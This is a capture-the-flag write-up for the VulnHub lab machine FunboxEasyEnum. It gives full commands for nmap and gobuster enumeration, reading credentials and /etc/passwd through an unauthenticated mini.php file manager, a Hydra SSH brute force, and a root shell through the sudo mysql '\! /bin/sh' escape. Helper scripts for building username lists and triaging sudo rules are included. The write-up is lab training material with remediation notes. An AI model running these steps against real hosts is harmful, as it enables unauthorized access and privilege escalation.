CTF WRITEUP VULNHUB LINUX EASY

FunboxEasyEnum — PHP Shell & MySQL Root

Written By: Th0mas_sh316y
Difficulty: Easy
Platform: VulnHub
Technique: GTFOBins · MySQL Sudo

FunboxEasyEnum Machine
Machine: FunboxEasyEnum · Easy · Linux · VulnHub

FunboxEasyEnum is an Easy-difficulty VulnHub machine well suited to beginners who want to practice web enumeration, file manager abuse, and sudo-based privilege escalation. The machine exposes an unauthenticated PHP file manager (mini.php) in the web root, which allows arbitrary file reads as the web server user. That read primitive leads either to direct credential recovery from the phpMyAdmin configuration file or, alternatively, to a username list that feeds an SSH brute force with Hydra. Either path ends at a sudo rule for the MySQL client that provides a clean GTFOBins shell escape to root.

01_Reconnaissance

An Nmap scan of the two open ports identifies a standard Ubuntu web server. The HTTP service on port 80 is the primary attack surface. The -A option already turns on version detection (-sV), the default script set (-sC), OS detection and traceroute, which is why the scan runs under sudo; the explicit -sV and -sC flags are redundant but harmless.

terminal / nmap
# -A implies -sV and -sC; the extra flags are redundant but do no harm
$ sudo nmap -p22,80 <TARGET_IP> -sV -A -sC

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1
80/tcp open  http    Apache httpd 2.4.29 (Ubuntu)

02_Web_Enumeration — Discovering mini.php

The default web root does not immediately present an obvious attack surface. Directory enumeration with a wordlist reveals several interesting paths, most notably mini.php — a single-file PHP file manager that is accessible without authentication.

terminal / directory brute force
$ gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

/index.php      (Status: 200)
/mini.php       (Status: 200)  ← PHP file manager
/phpmyadmin     (Status: 301)

# Confirm mini.php is accessible
$ curl http://<TARGET_IP>/mini.php

Security Risk — Unauthenticated File Managers

mini.php is a popular single-file PHP file manager often used for quick server-side file browsing. Leaving it in a publicly accessible web root without authentication is a critical misconfiguration. It allows any visitor to browse the server's file system, read configuration files, upload shells, and execute commands, in effect granting everything the web server account (typically www-data) can do, through a browser.

Through the mini.php interface, we can navigate the server file system. On Debian and Ubuntu the phpmyadmin package writes its database credentials, via dbconfig-common, to /etc/phpmyadmin/config-db.php in plaintext. That file is readable by the web server account, which is exactly the account mini.php runs as, so the file manager can open it directly.

terminal / phpmyadmin config
# read through the mini.php file viewer; shown as cat for readability
$ cat /etc/phpmyadmin/config-db.php

<?php
$dbuser='phpmyadmin';
$dbpass='[REDACTED]';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';

03_Alternative_Path — Hydra SSH Brute Force

If web-based credential recovery is blocked or unavailable, SSH brute force against a recovered username list is a viable alternative. Reading /etc/passwd through mini.php and keeping only the accounts that have a real login shell (not nologin or false) gives a short, targeted list, which cuts the brute force time considerably compared with guessing usernames as well as passwords.

terminal / hydra SSH
# hydra warns that SSH servers throttle parallel logins (MaxStartups) and
# recommends -t 4 for ssh; -t 64 may produce connection errors and missed hits
$ hydra -L usrn.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ssh://<TARGET_IP>:22 -t 64 -I

[22][ssh] host: <TARGET_IP>   login: goat   password: [REDACTED]

$ ssh goat@<TARGET_IP>
Password: [REDACTED]

goat@funbox3:~$ id
uid=1001(goat) gid=1001(goat) groups=1001(goat)
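Building the usrn.txt username list is the step the paragraph above leaves implicit. The snippet below is an added example, not part of the original writeup: it filters a constructed /etc/passwd excerpt (the layout is real, the accounts are made up) down to accounts that can actually log in over SSH, so Hydra does not waste time on service accounts.

```shell
#!/bin/sh
# Constructed stand-in for the lines one would read out of /etc/passwd through
# mini.php. It is not the target's real file; only the field layout matters.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
goat:x:1001:1001:,,,:/home/goat:/bin/bash'

# Print one candidate SSH username per line. Keep root (UID 0) and ordinary
# users (UID >= 1000, the Debian/Ubuntu convention) whose login shell is not
# nologin or false, since those accounts cannot authenticate over SSH anyway.
extract_users() {
    printf '%s\n' "$1" | awk -F: '
        $7 !~ /(nologin|false)$/ && ($3 == 0 || $3 >= 1000) { print $1 }
    '
}

# Redirect this to usrn.txt to feed hydra -L
extract_users "$SAMPLE_PASSWD"
```

On the real target the input is whatever mini.php shows for /etc/passwd, pasted into a file; the filter is the same. Dropping root from the list is worth considering if sshd has PermitRootLogin disabled, since every root guess is then wasted.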

Note — Two Paths, Same Destination

Both paths, credential extraction via mini.php and Hydra SSH brute force, lead to the same privilege escalation vector. In real engagements, having multiple access paths is valuable for redundancy. Here the config file extraction is the faster of the two: Hydra against rockyou.txt can take a long time even with a short username list. Path A only helps if the recovered database password is also accepted for a system login (the summary below lists an SSH login as phpmyadmin), so check that before falling back to the brute force.

04_PrivEsc — MySQL GTFOBins Sudo Escape

Once on the box as goat, sudo -l reveals a critical misconfiguration: goat can run /usr/bin/mysql as root without a password. The -e flag makes the mysql client execute the given text non-interactively and exit. \! is not SQL; it is the client's system command (an alias of system), which hands the rest of the line to /bin/sh. Because the client itself is running as root under sudo, so is the shell it spawns, and the prompt changes from $ to # once it appears.

terminal / privilege escalation
$ sudo -l
Matching Defaults entries:
    env_reset, mail_badpass

User goat may run the following commands:
    (root) NOPASSWD: /usr/bin/mysql

# GTFOBins — MySQL shell escape (-u root is the default target; plain `sudo mysql` works too)
$ sudo -u root /usr/bin/mysql -e '\! /bin/sh'
# id
uid=0(root)
# whoami
root
# cat /root/root.txt

Technique Note — MySQL GTFOBins

The MySQL client supports a shell escape via the \! command, which passes the rest of the line directly to the system shell. When MySQL is invoked with sudo, this shell runs as the sudo target (root). The -e flag allows this to be executed non-interactively in a single command without entering the MySQL interactive prompt. This technique is documented at GTFOBins (https://gtfobins.github.io/gtfobins/mysql/). Any database client with a shell escape command should be treated as a privilege escalation vector when accessible via sudo. The fix is to remove the rule; tagging it NOEXEC in sudoers stops the client from executing /bin/sh, but a root-privileged client can still read and write root-owned files through its own source and tee commands, so NOEXEC is damage limitation rather than a fix.
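The last sentence of the note generalises beyond mysql, so here is a small triage helper for it. This is an added example, not code from the writeup: it parses sudo -l output of the form shown above (a constructed sample with two extra rules for illustration) and flags every rule whose command is on a hand-copied subset of the GTFOBins sudo list. The list is an assumption kept short on purpose; the full one lives at https://gtfobins.github.io/.

```shell
#!/bin/sh
# Constructed sample of `sudo -l` output in the format shown above; not captured
# from the target. The less and systemctl rules are invented to show a hit and a miss.
SAMPLE_SUDO_L='Matching Defaults entries for goat on funbox3:
    env_reset, mail_badpass

User goat may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/systemctl status nginx'

# Assumed subset of binaries with a documented sudo shell escape on GTFOBins.
GTFO_SUDO="mysql psql sqlite3 vim vi nano less more man find awk perl python python3 bash sh env tar zip git ftp"

# Print "basename: rule" for every sudo rule whose command basename is in GTFO_SUDO.
# Rule lines look like "(user[:group]) [TAG:]... /path/to/bin [args]".
flag_gtfobins() {
    printf '%s\n' "$1" | awk -v list="$GTFO_SUDO" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) known[a[i]] = 1 }
        /^[ \t]*\(/ {
            rule = $0; sub(/^[ \t]+/, "", rule)
            line = rule
            # strip the "(runas)" spec, then any "TAG:" words such as NOPASSWD: or NOEXEC:
            sub(/^\([^)]*\)[ \t]*/, "", line)
            while (match(line, /^[A-Z_]+:[ \t]*/)) line = substr(line, RLENGTH + 1)
            cmd = line; sub(/[ \t].*$/, "", cmd)      # first word is the command path
            base = cmd; sub(/.*\//, "", base)         # basename of that path
            if (base in known) print base ": " rule
        }
    '
}

flag_gtfobins "$SAMPLE_SUDO_L"
```

Run it against `sudo -l` on a box you have just landed on (flag_gtfobins "$(sudo -l 2>/dev/null)"); a hit means the GTFOBins page for that binary is the next thing to read. A rule that pins arguments, like the systemctl one, is not flagged by basename alone and needs a manual look.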

05_Attack_Chain_Summary

  1. Nmap scan → ports 22 (SSH), 80 (HTTP) confirmed
  2. Gobuster → mini.php discovered (unauthenticated PHP file manager)
  3. Path A: mini.php → /etc/phpmyadmin/config-db.php → plaintext credentials
  4. Path B: mini.php → /etc/passwd → username list → Hydra SSH → goat:[REDACTED]
  5. SSH login as system user (goat or phpmyadmin)
  6. sudo -l → (root) NOPASSWD: /usr/bin/mysql
  7. sudo -u root /usr/bin/mysql -e '\! /bin/sh' → ROOT